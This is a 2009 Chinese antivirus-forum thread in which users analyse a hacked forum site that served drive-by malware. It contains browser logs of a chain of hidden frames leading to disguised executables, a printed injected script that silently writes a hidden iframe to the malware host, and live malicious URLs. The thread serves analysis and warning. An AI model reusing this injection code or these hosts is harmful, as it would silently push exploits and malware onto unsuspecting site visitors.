猫叔来 bbs.ikaka.com

aaccbbdd - 2009-1-16 21:07:00

Log is generated by FreShow.
[wide]http://images.366tian.net/bbstonglan/index.htm
[script]http://images.366tian.net/bbstonglan/js/flashow.js
[script]http://office.c4.fr/office.js?clie=2155&mid=601
[frame]http://daoye.nm.cn/a01_1272/new.html
[frame]http://daoye.nm.cn/a01_1272/who.htm
[frame]http://daoye.nm.cn/a01_1272/what.htm
[frame]http://daoye.nm.cn/a01_1272/../for.htm
[frame]http://daoye.nm.cn/a01_1272/../sms.htm
[frame]http://daoye.nm.cn/a01_1272/../no.htm
[frame]http://daoye.nm.cn/a01_1272/../yy123.htm
[frame]http://daoye.nm.cn/a01_1272/../yy456.htm
[frame]http://daoye.nm.cn/a01_1272/../real.htm
[frame]http://daoye.nm.cn/a01_1272/../real.html
[script]http://js.tongji.cn.yahoo.com/908988/ystat.js
[frame]http://count27.51yes.com/sa.aspx?id=275666147&refe='+window.parent.location+'&location=http%3A//office.js/&color=32x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29

中天被挂马
望猫叔详解

用户系统信息：Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5

aaccbbdd - 2009-1-16 21:08:00

据称是
http://user666.66-18.net/a01.css

baohe - 2009-1-16 21:09:00

http://images.366tian.net/bbstonglan/js/flashow.js的内容：

var focus_width=300
var focus_height=160
var text_height=0
var swf_height = focus_height+text_height
var texts='|||'
document.write('<embed src="flw/flashow.swf" wmode="opaque" FlashVars="pics='+pics+'&links='+links+'&texts='+texts+'&borderwidth='+focus_width+'&borderheight='+focus_height+'&textheight='+text_height+'" menu="false" quality="high" width="'+ focus_width +'" height="'+ focus_height +'" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer">');

4443434 - 2009-1-16 21:10:00

好深奥

baohe - 2009-1-16 21:11:00

引用:

原帖由 aaccbbdd 于 2009-1-16 21:08:00 发表
据称是
http://user666.66-18.net/a01.css

opera浏览器----------安全。

附件: 您所在的用户组无法下载或查看附件

aaccbbdd - 2009-1-16 21:11:00

var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
{
document.write('<iframe src=http://daoye.nm.cn/a01_1272/new.html width=66 height=0 border=0></iframe>');

document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count27.51yes.com/sa.aspx?id=275666147&refe='+window.parent.location+'&location=http://office.js/&color=32x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');

document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
}

挂马地址吧

aaccbbdd - 2009-1-16 21:12:00

貌似不是:default3:

aaccbbdd - 2009-1-16 21:15:00

完整版
kongzi的

Log is generated by FreShow.
[wide]http://bbs.366tian.net/
[script]http://bbs.366tian.net/include/javascript/common.js
[script]http://bbs.366tian.net/include/javascript/menu.js
[script]http://bbs.366tian.net/include/javascript/ajax.js
[script]http://rad.17luntan.com/Default.aspx?SiteID=82ff16a3-85bf-456b-9b20-7699cd1337ea&adType=searchbox
[script]http://bbs.366tian.net/forumdata/cache/google_var.js
[script]http://bbs.366tian.net/include/javascript/google.js
[frame]http://images.366tian.net/bbstonglan/index.htm
[script]http://images.366tian.net/bbstonglan/js/flashow.js
[script]http://office.c4.fr/office.js?clie=2155&mid=601
[frame]http://daoye.nm.cn/a01_1272/new.html
[frame]http://daoye.nm.cn/a01_1272/who.htm
[frame]http://daoye.nm.cn/a01_1272/m3322.html
[frame]http://daoye.nm.cn/a01_1272/x3322.html
[frame]http://daoye.nm.cn/a01_1272/what.htm
[object]http://user666.66-18.net/a01.css
[frame]http://daoye.nm.cn/a01_1272/../for.htm
[object]http://user666.66-18.net/for.css
[frame]http://daoye.nm.cn/a01_1272/../sms.htm
[object]http://user666.66-18.net/sms.css
[frame]http://daoye.nm.cn/a01_1272/../no.htm
[object]http://user666.66-18.net/no.css
[frame]http://daoye.nm.cn/a01_1272/../yy123.htm
[object]http://user666.66-18.net/bfyy.css
[frame]http://daoye.nm.cn/a01_1272/../yy456.htm
[object]http://user666.66-18.net/lz.css
[frame]http://daoye.nm.cn/a01_1272/../real.htm
[object]http://user666.66-18.net/re10.css
[frame]http://daoye.nm.cn/a01_1272/../real.html
[object]http://user666.66-18.net/re11.css
[script]http://js.tongji.cn.yahoo.com/908988/ystat.js
[frame]http://count27.51yes.com/sa.aspx?id=275666147&refe='+window.parent.location+'&location=http%3A//office.js/&color=32x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29
[script]http://cpro.baidu.com/cpro/ui/cp.js
[script]http://cpro.baidu.com/cpro/ui/cp.js
[script]http://s5.cnzz.com/stat.php?id=796&web_id=6515
[script]http://s.vdoing.com/u/22/11618.js
[script]http://cpro.baidu.com/cpro/ui/cp.js
[frame]http://bbs.366tian.net/760x60/760x60.html
[frame]http://u.heima8.com/pv/show.htm?sid=&wsid=103540&adid=20128&aiid=20128_760_30&reffer="+escape(reffer)+"&url="+escape(url)+"
[script]http://a05.insenz.com/adv?sid=500&gid=&fid=0&tid=0&random=G5iO
[script]http://download.wdknet.com/wdkchat/openimwindow_v2.js
[script]http://download.wdknet.com/wdkchat/imfunction.js

baohe - 2009-1-16 21:18:00

用OPERA，随便你弄那个css，都不中:default6:

附件: 您所在的用户组无法下载或查看附件

aaccbbdd - 2009-1-16 21:29:00

:default3: :default3: :default3:

毕竟是溢出病毒

A小可 - 2009-1-16 21:45:00

狮子，这帖放这儿，危险不？

aaccbbdd - 2009-1-16 21:50:00

还行
侃谈天下

gpsmmmm - 2009-1-16 22:32:00

......
好深奥哦~~

newcenturymoon - 2009-1-16 22:36:00

汗那个css是个PE文件直接拿下来扩展名改为 exe就能运行

aaccbbdd - 2009-1-16 22:38:00

瑞星报了

瑞星卡卡安全论坛